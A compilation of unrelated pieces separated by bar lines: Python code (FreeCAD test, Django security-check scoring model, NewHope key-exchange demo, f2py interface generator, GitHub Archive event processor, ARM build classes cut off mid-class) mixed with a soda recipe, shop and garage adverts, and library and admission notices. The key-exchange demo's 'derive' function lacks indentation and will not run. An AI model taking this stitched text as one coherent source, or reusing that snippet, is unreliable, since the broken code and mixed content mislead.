#!/usr/bin/env python
# -*- coding: utf-8 -*-
# test script for TechDraw module
# creates a page, 1 view and 1 section view
from __future__ import print_function
import FreeCAD
import Part
import Measure
import TechDraw
import os
def DVSectionTest():
    path = os.path.dirname(os.path.abspath(__file__))
    print('TDSection path: ' + path)
    templateFileSpec = path + '/TestTemplate.svg'
    FreeCAD.newDocument("TDSection")
    FreeCAD.setActiveDocument("TDSection")
    FreeCAD.ActiveDocument = FreeCAD.getDocument("TDSection")
    box = FreeCAD.ActiveDocument.addObject("Part::Box", "Box")
    page = FreeCAD.ActiveDocument.addObject('TechDraw::DrawPage', 'Page')
    FreeCAD.ActiveDocument.addObject('TechDraw::DrawSVGTemplate', 'Template')
    FreeCAD.ActiveDocument.Template.Template = templateFileSpec
    FreeCAD.ActiveDocument.Page.Template = FreeCAD.ActiveDocument.Template
    page.Scale = 5.0
    # page.ViewObject.show()  # unit tests run in console mode
    print("page created")
    view = FreeCAD.ActiveDocument.addObject('TechDraw::DrawViewPart', 'View')
    rc = page.addView(view)
    view.Source = [box]
    view.Direction = (0.0, 0.0, 1.0)
    view.Rotation = 0.0
    view.X = 30.0
    view.Y = 150.0
    print("view created")
    section = FreeCAD.ActiveDocument.addObject('TechDraw::DrawViewSection', 'Section')
    rc = page.addView(section)
    section.Source = [box]
    section.BaseView = view
    section.Direction = (0.0, 1.0, 0.0)
    section.SectionNormal = (0.0, 1.0, 0.0)
    section.SectionOrigin = (5.0, 5.0, 5.0)
    view.touch()
    print("section created")
    FreeCAD.ActiveDocument.recompute()
    rc = False
    if ("Up-to-date" in view.State) and ("Up-to-date" in section.State):
        rc = True
    FreeCAD.closeDocument("TDSection")
    return rc

if __name__ == '__main__':
    DVSectionTest()
|
I'm not sure whether it is the enticing labels or the flavors that float my boat (it's both!), but Maine Root sodas get me every time. And with it being October, the first full month of Fall with Halloween just around the corner, I'm a sucker for their Pumpkin Pie.
But better yet, you can try making your own Pumpkin Soda! If you're into that kind of thing, which I am... The easy way? Buy some pumpkin syrup and club soda. Add 3-5 pumps of syrup to the soda, and taste to your liking. Voila!
Alternatively, you can go really homemade with it. If you take a little extra time and put in a little extra effort, you'll have more control over the flavor and contents. Remember, as warm and inviting as pumpkin sounds, the squash itself is actually quite bland, so you'll need a spice or two, but then it's just three simple steps.
1) In a small pot, combine the water, spice, and sugar.
2) Bring it to a simmer on top of the stove until the sugar is dissolved into a simple syrup consistency.
3) Remove the pot from the heat and add the pumpkin puree.
After the mixture cools, add as much, or as little, as you'd like to a cup of club soda for a homemade Halloween treat! The mixture will keep best when refrigerated. Or better yet, freeze some cubes of the mixture and add them to soda for that extra flair.
|
from django.db import models
from django_extensions.db.models import TimeStampedModel
class Check(TimeStampedModel):
    url = models.URLField()
    no_of_recommendations = models.IntegerField(default=0)
    runs_debug = models.BooleanField()
    supports_https = models.BooleanField()
    heartbleed_vuln = models.BooleanField()
    hsts_header_found = models.BooleanField()
    xframe_header_found = models.BooleanField()
    admin_found = models.BooleanField()
    admin_forces_https = models.NullBooleanField()
    login_found = models.BooleanField()
    login_forces_https = models.NullBooleanField()
    allows_trace = models.BooleanField()
    csrf_cookie_found = models.BooleanField()
    session_cookie_found = models.BooleanField()
    session_cookie_secure = models.NullBooleanField()
    session_cookie_httponly = models.NullBooleanField()

    def update_recommendation_count(self):
        self.no_of_recommendations = 0
        if self.runs_debug: self.no_of_recommendations += 1
        if not self.supports_https: self.no_of_recommendations += 1
        if self.heartbleed_vuln: self.no_of_recommendations += 1
        if not self.hsts_header_found: self.no_of_recommendations += 1
        if not self.xframe_header_found: self.no_of_recommendations += 1
        if self.admin_found and not self.admin_forces_https: self.no_of_recommendations += 1
        if self.login_found and not self.login_forces_https: self.no_of_recommendations += 1
        if self.allows_trace: self.no_of_recommendations += 1
        # if not self.csrf_cookie_found: self.no_of_recommendations += 1
        if self.session_cookie_found and not self.session_cookie_secure: self.no_of_recommendations += 1
        if self.session_cookie_found and not self.session_cookie_httponly: self.no_of_recommendations += 1

    @property
    def secure_percentage(self):
        # worst is 10 recommendations, best is 0
        return int(100 - round(10 * self.no_of_recommendations))

    @property
    def proven_django(self):
        return (self.runs_debug or self.csrf_cookie_found
                or self.session_cookie_found or self.admin_found)
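The scoring above can be exercised without a Django database; a minimal standalone sketch, where the helper names `count_recommendations` and `secure_percentage` are illustrative stand-ins mirroring the model's logic:

```python
# Standalone sketch of Check.update_recommendation_count / secure_percentage;
# plain booleans stand in for the model fields (one point per failed check).
def count_recommendations(runs_debug, supports_https, heartbleed_vuln,
                          hsts_header_found, xframe_header_found,
                          admin_found, admin_forces_https,
                          login_found, login_forces_https,
                          allows_trace, session_cookie_found,
                          session_cookie_secure, session_cookie_httponly):
    n = 0
    n += runs_debug
    n += not supports_https
    n += heartbleed_vuln
    n += not hsts_header_found
    n += not xframe_header_found
    n += admin_found and not admin_forces_https
    n += login_found and not login_forces_https
    n += allows_trace
    n += session_cookie_found and not session_cookie_secure
    n += session_cookie_found and not session_cookie_httponly
    return n

def secure_percentage(n):
    # worst is 10 recommendations -> 0%, best is 0 -> 100%
    return int(100 - round(10 * n))

# A site that passes every check scores 100%; one failing everything scores 0%.
perfect = count_recommendations(False, True, False, True, True,
                                False, None, False, None,
                                False, True, True, True)
worst = count_recommendations(True, False, True, False, False,
                              True, False, True, False,
                              True, True, False, False)
print(secure_percentage(perfect), secure_percentage(worst))  # -> 100 0
```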
|
Are you looking for the map of Krems an der Donau? Find any address on the map of Krems an der Donau or calculate your itinerary to and from Krems an der Donau, find all the tourist attractions and Michelin Guide restaurants in Krems an der Donau. The ViaMichelin map of Krems an der Donau: get the famous Michelin maps, the result of more than a century of mapping experience.
|
from nhxpoly.nhxpoly import NewHopeXSPolyBox
from newhope import newhope
from hashlib import sha256
"""This file shows a test run of
the NewHope_X25519_XSalsa20_Poly1305
key exchange protocol"""
user1 = NewHopeXSPolyBox()
user1.name = 'Alice'
user1.genPrekeyChunk()
user1.log('Prekey chunk created: %s' % repr([x for x in user1.prekey_chunk_1]))
user2 = NewHopeXSPolyBox()
user2.name = 'Bob'
user2.createSealedBox()
user1.setSenderPubKey(user2.pk)
user2.log('Created a X25519_XSalsa20_Poly1305 sealed box and sent public key to %s' % user1.name)
user1.encryptPrekeyChunk()
user1.log('Encrypted prekey chunk using the received X25519 public key (sealed box, sender-anonymous).')
user2.enc_prekey_chunk_1 = user1.enc_prekey_chunk_1
user2.openSealedBox()
user2.log('First prekey chunk decrypted %s' % repr([x for x in user2.prekey_chunk_1]))
user1.genSeed()
user2.genSeed()
user1.initNewHope()
user1.genCommitmentHash()
user2.recv_commitment = user1.commitment #user1 sends commitment hash
user2.log('NewHope Seed commitment received with hash %s' % user2.recv_commitment)
user2.recv_message = user1.message
user2.recv_seed = user1.seed #user1 sends (reveals) seed
user2.verifyCommitment()
user2.log('Seed verification succeeded. Authentic NewHope message received')
user2.message = newhope.sharedb(user1.message)
user1.log('NewHope initial authenticated message exchanged')
user2.genCommitmentHash()
user1.recv_commitment = user2.commitment #User2 sends commitment
user1.log('NewHope Seed commitment received with hash %s' % user1.recv_commitment)
user1.recv_message = user2.message
user1.recv_seed = user2.seed
user1.verifyCommitment()
user1.log('Seed verification succeeded. Authentic NewHope message received')
user1.message = newhope.shareda(user2.message)
user1.log('NewHope final authenticated message exchanged')
user2.createNewHopeSharedKeyb()
user1.createNewHopeSharedKeya()
assert user2.shared_newhope_key == user1.shared_newhope_key
user2.log('NewHope shared key %s' % user2.shared_newhope_key)
user1.log('NewHope shared key %s' % user1.shared_newhope_key)
user2.combine_prekey_chunks()
user1.combine_prekey_chunks()
user2.log('Combined prekey %s' % user2.prekey)
user1.log('Combined prekey %s' % user1.prekey)
print('NewHope_X25519_XSalsa20_Poly1305 key exchange successful.')
print('Pre-key ready for key derivation..')
#Very simple possible key-derivation...
def derive(prekey):
prekey = ''.join([chr(_) for _ in prekey])
prekey = prekey.encode()
return sha256(prekey).hexdigest()
user1.log('Derived key:' + derive(user1.prekey))
user2.log('Derived key:' + derive(user2.prekey))
assert derive(user1.prekey) == derive(user2.prekey)
print('Derived keys match!')
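The genCommitmentHash / verifyCommitment steps above follow the standard hash commit-reveal pattern; a minimal sketch with sha256 (the `commit`/`verify` helpers are illustrative, not the NewHopeXSPolyBox API):

```python
from hashlib import sha256
import os

def commit(seed, message):
    # Commit to the seed (and message) before revealing either.
    return sha256(seed + message).hexdigest()

def verify(commitment, seed, message):
    # After the reveal, the peer recomputes the hash and compares.
    return commitment == sha256(seed + message).hexdigest()

seed = os.urandom(32)
message = b'newhope-public-message'
c = commit(seed, message)
assert verify(c, seed, message)            # honest reveal passes
assert not verify(c, os.urandom(32), message)  # substituted seed fails
print('commitment verified')
```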
|
The library is open, with 5 new conference rooms ready for you to enjoy! All library conference rooms have been added to the room scheduler, which is managed through the Student Affairs Office. These rooms are great for small group meetings, rounds, or private study sessions and hold from 8 up to 19 individuals. When the rooms are not scheduled, they are open on a first-come, first-served basis.
Student Affairs now also manages reservations of the PBL Lab (Computer Lab) on the 2nd floor (for course-related reservations only) when the majority of the lab will be in use. Such reservations can only be requested by Faculty/Staff; no student, club, or individual reservations will be honored. When the rooms or computer stations are not scheduled, they are open on a first-come, first-served basis.
Who Can Schedule a Room?
LSU SVM Faculty, Staff, and Students can schedule rooms for events, lectures, meetings, office parties, training or courses.
Although room reservations are taken on a first-come, first-served basis, SVM core curriculum courses take precedence over all other reservations, whether or not a reservation is in place. Every attempt will be made to move a standing reservation into a new location when possible.
Club meetings will only be honored for clubs that have filled out the appropriate club registration information.
Always check the scheduler before using a room!
VCS Conference Rooms and Lab are not scheduled through the Student Affairs Office.
Rooms 1840 and 2313 are coordinated by Kevin Oubre at koubre2@lsu.edu.
Room 1301 B is coordinated by Sarah Keeton at sorlik1@lsu.edu.
|
#!/usr/bin/env python
import os
import re
from distutils.dir_util import mkpath
def all_subroutines(interface_in):
    # remove comments
    comment_block_exp = re.compile(r'/\*(?:\s|.)*?\*/')
    subroutine_exp = re.compile(r'subroutine (?:\s|.)*?end subroutine.*')
    function_exp = re.compile(r'function (?:\s|.)*?end function.*')
    interface = comment_block_exp.sub('', interface_in)
    subroutine_list = subroutine_exp.findall(interface)
    function_list = function_exp.findall(interface)
    subroutine_list = subroutine_list + function_list
    subroutine_list = map(lambda x: x.strip(), subroutine_list)
    return subroutine_list

def real_convert(val_string):
    return val_string

def complex_convert(val_string):
    return '(' + val_string + ',0.)'

def convert_types(interface_in, converter):
    regexp = re.compile(r'<type_convert=(.*?)>')
    interface = interface_in[:]
    while 1:
        sub = regexp.search(interface)
        if sub is None:
            break
        converted = converter(sub.group(1))
        interface = interface.replace(sub.group(), converted)
    return interface

def generic_expand(generic_interface, skip_names=[]):
    generic_types = {'s':  ('real', 'real', real_convert,
                            'real'),
                     'd':  ('double precision', 'double precision', real_convert,
                            'double precision'),
                     'c':  ('complex', 'complex', complex_convert,
                            'real'),
                     'z':  ('double complex', 'double complex', complex_convert,
                            'double precision'),
                     'cs': ('complex', 'real', complex_convert,
                            'real'),
                     'zd': ('double complex', 'double precision', complex_convert,
                            'double precision'),
                     'sc': ('real', 'complex', real_convert,
                            'real'),
                     'dz': ('double precision', 'double complex', real_convert,
                            'double precision')}
    generic_c_types = {'real': 'float',
                       'double precision': 'double',
                       'complex': 'complex_float',
                       'double complex': 'complex_double'}
    # cc_types is specific in ATLAS C BLAS, in particular, for complex arguments
    generic_cc_types = {'real': 'float',
                        'double precision': 'double',
                        'complex': 'void',
                        'double complex': 'void'}
    # 2. get all subroutines
    subs = all_subroutines(generic_interface)
    print len(subs)
    # loop through the subs
    type_exp = re.compile(r'<tchar=(.*?)>')
    TYPE_EXP = re.compile(r'<TCHAR=(.*?)>')
    routine_name = re.compile(r'(subroutine|function)\s*(?P<name>\w+)\s*\(')
    interface = ''
    for sub in subs:
        # 3. Find the typecodes to use:
        m = type_exp.search(sub)
        if m is None:
            interface = interface + '\n\n' + sub
            continue
        type_chars = m.group(1)
        # get rid of spaces
        type_chars = type_chars.replace(' ', '')
        # get a list of the characters (or character pairs)
        type_chars = type_chars.split(',')
        # Now get rid of the special tag that contained the types
        sub = re.sub(type_exp, '<tchar>', sub)
        m = TYPE_EXP.search(sub)
        if m is not None:
            sub = re.sub(TYPE_EXP, '<TCHAR>', sub)
        sub_generic = sub.strip()
        for char in type_chars:
            type_in, type_out, converter, rtype_in = generic_types[char]
            sub = convert_types(sub_generic, converter)
            function_def = sub.replace('<tchar>', char)
            function_def = function_def.replace('<TCHAR>', char.upper())
            function_def = function_def.replace('<type_in>', type_in)
            function_def = function_def.replace('<type_in_c>',
                                                generic_c_types[type_in])
            function_def = function_def.replace('<type_in_cc>',
                                                generic_cc_types[type_in])
            function_def = function_def.replace('<rtype_in>', rtype_in)
            function_def = function_def.replace('<rtype_in_c>',
                                                generic_c_types[rtype_in])
            function_def = function_def.replace('<type_out>', type_out)
            function_def = function_def.replace('<type_out_c>',
                                                generic_c_types[type_out])
            m = routine_name.match(function_def)
            if m:
                if m.group('name') in skip_names:
                    print 'Skipping', m.group('name')
                    continue
            else:
                print 'Possible bug: Failed to determine routine name'
            interface = interface + '\n\n' + function_def
    return interface

# def interface_to_module(interface_in, module_name, include_list, sdir='.'):
def interface_to_module(interface_in, module_name):
    pre_prefix = "!%f90 -*- f90 -*-\n"
    # heading and tail of the module definition.
    file_prefix = "\npython module " + module_name + " ! in\n" \
                  "!usercode '''#include \"cblas.h\"\n" \
                  "!'''\n" \
                  " interface \n"
    file_suffix = "\n end interface\n" \
                  "end module %s" % module_name
    return pre_prefix + file_prefix + interface_in + file_suffix

def process_includes(interface_in, sdir='.'):
    include_exp = re.compile(r'\n\s*[^!]\s*<include_file=(.*?)>')
    include_files = include_exp.findall(interface_in)
    for filename in include_files:
        f = open(os.path.join(sdir, filename))
        interface_in = interface_in.replace('<include_file=%s>' % filename,
                                            f.read())
        f.close()
    return interface_in

def generate_interface(module_name, src_file, target_file, skip_names=[]):
    print "generating", module_name, "interface"
    f = open(src_file)
    generic_interface = f.read()
    f.close()
    sdir = os.path.dirname(src_file)
    generic_interface = process_includes(generic_interface, sdir)
    generic_interface = generic_expand(generic_interface, skip_names)
    module_def = interface_to_module(generic_interface, module_name)
    mkpath(os.path.dirname(target_file))
    f = open(target_file, 'w')
    user_routines = os.path.join(sdir, module_name + "_user_routines.pyf")
    if os.path.exists(user_routines):
        f2 = open(user_routines)
        f.write(f2.read())
        f2.close()
    f.write(module_def)
    f.close()

def process_all():
    # process the standard files.
    for name in ['fblas', 'cblas', 'clapack', 'flapack']:
        generate_interface(name, 'generic_%s.pyf' % (name), name + '.pyf')

if __name__ == "__main__":
    process_all()
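The `<type_convert=...>` substitution done by convert_types can be checked in isolation; the template string below is made up for illustration:

```python
import re

def complex_convert(val_string):
    # Wrap a real literal as a Fortran complex constant, e.g. 1.0 -> (1.0,0.)
    return '(' + val_string + ',0.)'

def convert_types(interface_in, converter):
    # Replace every <type_convert=X> tag with converter(X), as in the
    # generator above.
    regexp = re.compile(r'<type_convert=(.*?)>')
    interface = interface_in[:]
    while 1:
        sub = regexp.search(interface)
        if sub is None:
            break
        converted = converter(sub.group(1))
        interface = interface.replace(sub.group(), converted)
    return interface

template = 'parameter (one=<type_convert=1.0>)'
print(convert_types(template, complex_convert))  # -> parameter (one=(1.0,0.))
```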
|
Central Garage (Streatham) Ltd is a professionally run garage that has been established for over 50 years, offering body repairs, car repairs, car mechanics, body work, car servicing and vehicle repairs. We are vehicle air conditioning specialists for all makes. * Mechanical/Electrical/Diesel Engineers * Specialists in Rover Vehicles * Servicing for all Makes * Body Repairs * Vehicle Recovery. Your local garage for over 50 years: all of our new parts come with a 12 month guarantee, and our business is built on a reputation for excellent service and high quality workmanship. In addition to our garage services, we offer a range of air conditioning work including repair and maintenance. We specialise in the maintenance and repair of Rover vehicles, and also offer body repair, general maintenance, servicing, fault finding and diagnostic solutions for all models. Our business offers a comprehensive range of general garage services and vehicle air conditioning for private and business vehicles, with vehicle recovery across South West London from our base at Streatham Common South. Central Garage (Streatham) Ltd is a member of the Retail Motor Industry Federation and the Good Garage Scheme. For further information or any queries, contact the number above.
|
"""
Mostly a copy of (django-registration/)registration/backends/default/urls.py and
registration/auth_urls.py, but using our own backends:
* UsernameLessAuthenticationBackend for authentication
* UsernameLessRegistrationBackend for registration
"""
from django.conf.urls.defaults import *
from django.views.generic.simple import direct_to_template
from django.contrib.sites.models import Site
from django.contrib.auth import views as auth_views
from registration.views import activate
from registration.views import register
from forms import UsernameLessAuthenticationForm
auth_urls = patterns('',
    url(r'^login/$',
        auth_views.login,
        {'template_name': 'registration/login.html',
         'authentication_form': UsernameLessAuthenticationForm, },
        name='auth_login'),
    url(r'^logout/$',
        auth_views.logout,
        {'template_name': 'registration/logout.html'},
        name='auth_logout'),
    url(r'^password/change/$',
        auth_views.password_change,
        name='auth_password_change'),
    url(r'^password/change/done/$',
        auth_views.password_change_done,
        name='auth_password_change_done'),
    url(r'^password/reset/$',
        auth_views.password_reset,
        name='auth_password_reset'),
    url(r'^password/reset/confirm/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/$',
        auth_views.password_reset_confirm,
        name='auth_password_reset_confirm'),
    url(r'^password/reset/complete/$',
        auth_views.password_reset_complete,
        name='auth_password_reset_complete'),
    url(r'^password/reset/done/$',
        auth_views.password_reset_done,
        name='auth_password_reset_done'),
)

urlpatterns = patterns('',
    url(r'^activate/complete/$',
        direct_to_template,
        {
            'template': 'registration/activation_complete.html',
            'extra_context': {'site': Site.objects.get_current()},
        }, name='registration_activation_complete'),
    # Activation keys get matched by \w+ instead of the more specific
    # [a-fA-F0-9]{40} because a bad activation key should still get to the view;
    # that way it can return a sensible "invalid key" message instead of a
    # confusing 404.
    url(r'^activate/(?P<activation_key>\w+)/$',
        activate,
        {'backend': 'usernameless.auth.UsernameLessRegistrationBackend'},
        name='registration_activate'),
    url(r'^register/$',
        register,
        {'backend': 'usernameless.auth.UsernameLessRegistrationBackend'},
        name='registration_register'),
    url(r'^register/complete/$',
        direct_to_template,
        {
            'template': 'registration/registration_complete.html',
            'extra_context': {'site': Site.objects.get_current()},
        }, name='registration_complete'),
    url(r'^register/closed/$',
        direct_to_template,
        {'template': 'registration/registration_closed.html'},
        name='registration_disallowed'),
    (r'', include(auth_urls)),
)
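The comment about matching activation keys with `\w+` rather than `[a-fA-F0-9]{40}` is easy to confirm: the looser pattern still matches a malformed key, so the view gets a chance to render an "invalid key" page instead of a 404:

```python
import re

# The loose pattern used above versus the stricter 40-hex-digit alternative.
loose = re.compile(r'^activate/(?P<activation_key>\w+)/$')
strict = re.compile(r'^activate/(?P<activation_key>[a-fA-F0-9]{40})/$')

bad_key_url = 'activate/not_a_real_key/'
assert loose.match(bad_key_url)            # routed to the view -> "invalid key" page
assert strict.match(bad_key_url) is None   # would 404 instead
print('loose pattern routes bad keys to the view')
```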
|
Our Rosa top is made using the softest eyelash lace. Flirty and fun in a cropped style, Rosa pairs well over the Sienna satin cami and with the Kyla mesh or Mila tulle skirt.
Our Rosa lace top comes in two colours, burgundy or ivory, and can be ordered with or without the delicate cap sleeve.
|
import sqlalchemy as sa
from meta import Base
from meta import Session
from lib.model import CommaList
from person import Person
from registration import Registration
from registration_product import RegistrationProduct
# find_by_id below calls abort(); under Pylons this typically comes from:
from pylons.controllers.util import abort
class RegoNote(Base):
    """Misc notes from the organising team on a person
    """
    __tablename__ = 'rego_note'

    id = sa.Column(sa.types.Integer, primary_key=True)
    rego_id = sa.Column(sa.types.Integer, sa.ForeignKey('registration.id'))
    note = sa.Column(sa.types.Text)
    block = sa.Column(sa.types.Boolean, nullable=False)
    by_id = sa.Column(sa.types.Integer, sa.ForeignKey('person.id'), nullable=False)
    creation_timestamp = sa.Column(sa.types.DateTime, nullable=False, default=sa.func.current_timestamp())
    last_modification_timestamp = sa.Column(sa.types.DateTime, nullable=False, default=sa.func.current_timestamp(), onupdate=sa.func.current_timestamp())

    # relations
    by = sa.orm.relation(Person, backref=sa.orm.backref('notes_made', cascade="all, delete-orphan", lazy=True))
    rego = sa.orm.relation(Registration, backref=sa.orm.backref('notes', cascade="all, delete-orphan", lazy=True))

    def __init__(self, **kwargs):
        super(RegoNote, self).__init__(**kwargs)

    @classmethod
    def find_by_id(cls, id, abort_404=True):
        result = Session.query(RegoNote).filter_by(id=id).first()
        if result is None and abort_404:
            abort(404, "No such rego note object")
        return result

    @classmethod
    def find_all(cls):
        return Session.query(RegoNote).order_by(RegoNote.id).all()
|
Selection of students is done irrespective of caste, creed, religion, etc. The candidate should be certified by a family doctor as capable of doing technical work. Mentally challenged or borderline-intelligence candidates are admitted provided they are capable of performing simple functions and following simple instructions; they have to produce a medical certificate as well as their IQ test report.
The candidate should be 16 years of age or above. If a candidate doesn't have any parent, then he should at least have a guardian, relative, or organization that can take responsibility.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import os.path
import re
import json
import requests
import shutil
import gzip
from tempfile import NamedTemporaryFile
import StringIO
from datetime import date
from collections import defaultdict
from .db import redis, mongodb, pipe as _pipe, format_key as _format
# The URL template for the GitHub Archive.
archive_url = ("http://data.githubarchive.org/"
"{year}-{month:02d}-{day:02d}-{hour}.json.gz")
local_url = "./data/{year}-{month:02d}-{day:02d}-{hour}.json.gz"
date_re = re.compile(r"([0-9]{4})-([0-9]{2})-([0-9]{2})-([0-9]+)\.json.gz")
# mkdir data directory
os.path.exists('./data') or os.mkdir('./data')
def fetch_one(year, month, day, hour):
    '''Fetch one archived timeline.'''
    local_fn = local_url.format(year=year, month=month, day=day, hour=hour)
    if os.path.exists(local_fn):
        print '%s exists.' % local_fn
        return local_fn
    else:
        url = archive_url.format(year=year, month=month, day=day, hour=hour)
        r = None
        try:
            r = requests.get(url, timeout=120)
            if r.status_code == 200:
                f = NamedTemporaryFile("wb", delete=False)
                f.write(r.content)
                f.flush()
                os.fsync(f.fileno())
                f.close()
                shutil.move(f.name, local_fn)
                print("Fetching %s succeeded." % url)
                return local_fn
            else:
                print("Fetching %s failed." % url)
        except:
            return None
        finally:
            if r is not None:
                r.close()
        return None
def _gen_json(buf):
    line = buf.readline()
    while line:
        try:
            yield json.loads(line)
        except Exception as e:
            print "Error during load json: %s" % e
        line = buf.readline()
def file_process(filename, fns):
    if not filename or not os.path.exists(filename):
        return
    fns = fns if type(fns) is list else [fns]
    year, month, day, hour = map(int, date_re.findall(filename)[0])
    r = redis()
    repl = lambda m: ''
    for fn in fns:
        print('Processing %s with %s' % (filename, fn.__name__))
        fn_key = _format('function:%s' % fn.__name__)
        fn_value = "{year}-{month:02d}-{day:02d}-{hour}".format(
            year=year, month=month, day=day, hour=hour
        )
        if not r.sismember(fn_key, fn_value):
            with gzip.GzipFile(filename) as f:
                content = f.read().decode("utf-8", errors="ignore")
                content = re.sub(u"[^\\}]([\\n\\r\u2028\u2029]+)[^\\{]", repl, content)
                content = '}\n{"'.join(content.split('}{"'))
                buf = StringIO.StringIO(content)
                fn(_gen_json(buf), year, month, day, hour)
                r.sadd(fn_key, fn_value)
def _mongo_default():
    return defaultdict(lambda: defaultdict(int))
def events_process(events, year, month, day, hour):
    '''main events process method.'''
    weekday = date(year=year, month=month, day=day).strftime("%w")
    year_month = "{year}-{month:02d}".format(year=year, month=month)
    pipe = _pipe()
    users = defaultdict(_mongo_default)
    repos = defaultdict(_mongo_default)
    languages = defaultdict(_mongo_default)
    for event in events:
        actor = event["actor"]
        attrs = event.get("actor_attributes", {})
        if actor is None or attrs.get("type") != "User":
            # This was probably an anonymous event (like a gist event)
            # or an organization event.
            continue
        # Normalize the user name.
        key = actor.lower()
        # Get the type of event.
        evttype = event["type"]
        nevents = 1
        # Can this be called a "contribution"?
        contribution = evttype in ["IssuesEvent", "PullRequestEvent",
                                   "PushEvent"]
        # Increment the global sum histograms.
        pipe.incr(_format("total"), nevents)
        pipe.hincrby(_format("day"), weekday, nevents)
        pipe.hincrby(_format("hour"), hour, nevents)
        pipe.hincrby(_format("month"), year_month, nevents)
        pipe.zincrby(_format("user"), key, nevents)
        pipe.zincrby(_format("event"), evttype, nevents)
        # Event histograms.
        pipe.hincrby(_format("event:{0}:day".format(evttype)),
                     weekday, nevents)
        pipe.hincrby(_format("event:{0}:hour".format(evttype)),
                     hour, nevents)
        pipe.hincrby(_format("event:{0}:month".format(evttype)),
                     year_month, nevents)
        # User schedule histograms.
        incs = [
            'total',
            'day.%s' % weekday,
            'hour.%02d' % hour,
            'month.%04d.%02d' % (year, month),
            'event.%s.day.%s' % (evttype, weekday),
            'event.%s.hour.%02d' % (evttype, hour),
            'event.%s.month.%04d.%02d' % (evttype, year, month)
        ]
        for inc in incs:
            users[key]['$inc'][inc] += nevents
        # Parse the name and owner of the affected repository.
        repo = event.get("repository", {})
        owner, name, org = (repo.get("owner"), repo.get("name"),
                            repo.get("organization"))
        if owner and name:
            repo_name = "{0}/{1}".format(owner, name)
            # Save the social graph.
            users[key]['repos'][repo_name] += nevents
            repos[repo_name]['$inc']['total'] += nevents
            repos[repo_name]['$inc']['events.%s' % evttype] += nevents
            repos[repo_name]['$inc']['users.%s' % key] += nevents
            # Do we know what the language of the repository is?
            language = repo.get("language")
            if language:
                # Which are the most popular languages?
                languages[language]['$inc']['total'] += nevents
                languages[language]['$inc']['events.%s' % evttype] += nevents
                languages[language]['$inc']['month.%d.%02d' % (year, month)] += nevents
                # The most used language of users
                users[key]['$inc']['lang.%s' % language] += nevents
                # Who are the most important users of a language?
                if contribution:
                    pipe.zincrby(_format("lang:{0}:user".format(language)),
                                 key, nevents)
    users_stats = mongodb().users_stats
    for key in users:
        users_stats.update({'_id': key}, {'$inc': users[key]['$inc']}, True)
        for repo_name in users[key]['repos']:
            users_stats.update(
                {'_id': key, 'repos.repo': {'$ne': repo_name}},
                {'$addToSet': {'repos': {'repo': repo_name, 'events': 0}}},
                False
            )
            users_stats.update(
                {'_id': key, 'repos.repo': repo_name},
                {'$inc': {'repos.$.events': users[key]['repos'][repo_name]}},
                False
            )
    del users
    languages_stats = mongodb().languages
    for key in languages:
        languages_stats.update({'_id': key},
                               {'$inc': languages[key]['$inc']},
                               True)
    del languages
    repos_stats = mongodb().repositories
    for key in repos:
        repos_stats.update({'_id': key},
                           {'$inc': repos[key]['$inc']},
                           True)
    del repos
    pipe.execute()
def events_process_lang_contrib(events, year, month, day, hour):
    '''lang contribution process method.'''
    users = defaultdict(_mongo_default)
    for event in events:
        actor = event["actor"]
        attrs = event.get("actor_attributes", {})
        if actor is None or attrs.get("type") != "User":
            # This was probably an anonymous event (like a gist event)
            # or an organization event.
            continue
        # Normalize the user name.
        key = actor.lower()
        # Get the type of event.
        evttype = event["type"]
        nevents = 1
        # Can this be called a "contribution"?
        contribution = evttype in ["IssuesEvent", "PullRequestEvent", "PushEvent"]
        repo = event.get("repository", {})
        owner, name, org, language = (repo.get("owner"),
                                      repo.get("name"),
                                      repo.get("organization"),
                                      repo.get("language"))
        if owner and name and language and contribution:
            # The most used language of users
            users[key]['$inc']['contrib.%s.%d.%02d' % (language, year, month)] += nevents
    users_stats = mongodb().users_stats
    for key in users:
        users_stats.update({'_id': key}, {'$inc': users[key]['$inc']}, True)
    del users
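_gen_json above treats each archive as line-delimited JSON and skips lines that fail to parse; a Python 3 sketch of the same idea (io.StringIO stands in for the Python 2 StringIO module used above):

```python
import io
import json

def gen_json(buf):
    # Yield one decoded object per line, skipping lines that fail to parse,
    # mirroring _gen_json's error handling.
    for line in buf:
        try:
            yield json.loads(line)
        except ValueError:
            continue

data = '{"type": "PushEvent"}\nnot json\n{"type": "IssuesEvent"}\n'
events = list(gen_json(io.StringIO(data)))
print([e["type"] for e in events])  # -> ['PushEvent', 'IssuesEvent']
```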
|
from catalyst import builder

class generic_arm(builder.generic):
    "Abstract base class for all arm (little endian) builders"
    def __init__(self,myspec):
        builder.generic.__init__(self,myspec)
        self.settings["CFLAGS"]="-O2 -pipe"

class generic_armeb(builder.generic):
    "Abstract base class for all arm (big endian) builders"
    def __init__(self,myspec):
        builder.generic.__init__(self,myspec)
        self.settings["CFLAGS"]="-O2 -pipe"

class arch_arm(generic_arm):
    "Builder class for arm (little endian) target"
    def __init__(self,myspec):
        generic_arm.__init__(self,myspec)
        self.settings["CHOST"]="arm-unknown-linux-gnu"

class arch_armeb(generic_armeb):
    "Builder class for arm (big endian) target"
    def __init__(self,myspec):
        generic_armeb.__init__(self,myspec)
        self.settings["CHOST"]="armeb-unknown-linux-gnu"

class arch_armv4l(generic_arm):
    "Builder class for armv4l target"
    def __init__(self,myspec):
        generic_arm.__init__(self,myspec)
        self.settings["CHOST"]="armv4l-unknown-linux-gnu"
        self.settings["CFLAGS"]+=" -march=armv4"

class arch_armv4tl(generic_arm):
    "Builder class for armv4tl target"
    def __init__(self,myspec):
        generic_arm.__init__(self,myspec)
        self.settings["CHOST"]="armv4tl-softfloat-linux-gnueabi"
        self.settings["CFLAGS"]+=" -march=armv4t"

class arch_armv5tl(generic_arm):
    "Builder class for armv5tl target"
    def __init__(self,myspec):
        generic_arm.__init__(self,myspec)
        self.settings["CHOST"]="armv5tl-softfloat-linux-gnueabi"
        self.settings["CFLAGS"]+=" -march=armv5t"

class arch_armv5tel(generic_arm):
    "Builder class for armv5tel target"
    def __init__(self,myspec):
        generic_arm.__init__(self,myspec)
        self.settings["CHOST"]="armv5tel-softfloat-linux-gnueabi"
        self.settings["CFLAGS"]+=" -march=armv5te"

class arch_armv5tejl(generic_arm):
    "Builder class for armv5tejl target"
    def __init__(self,myspec):
        generic_arm.__init__(self,myspec)
        self.settings["CHOST"]="armv5tejl-softfloat-linux-gnueabi"
        self.settings["CFLAGS"]+=" -march=armv5te"

class arch_armv6j(generic_arm):
